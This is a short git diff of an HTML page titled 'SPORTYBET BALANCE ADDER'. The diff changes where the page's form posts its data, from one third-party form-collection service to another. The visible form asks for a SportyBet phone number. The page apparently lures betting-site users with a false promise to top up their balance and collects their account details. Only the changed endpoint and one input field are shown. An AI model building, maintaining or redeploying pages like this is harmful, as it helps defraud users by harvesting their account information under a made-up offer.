--- a/index.html
+++ b/index.html
@@ -62,7 +62,7 @@
  <h1 class="mt-5" style="text-align: center;font-size: x-large;font-weight: 900;font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;">SPORTYBET BALANCE ADDER</h1>
 
  <p class="mt-5" style="font-size: small; font-weight: 700;">*Indicates required field*</p>
- <form action="https://formspree.io/f/mqkvpwvk" method="post">
+ <form action="https://submit-form.com/dYtKS0L4" method="post">
    <div class="mb-3 mt-2">
      <input type="number" class="form-control" id="number" placeholder="SPORTYBET PHONE NUMBER" name="name">
    </div>
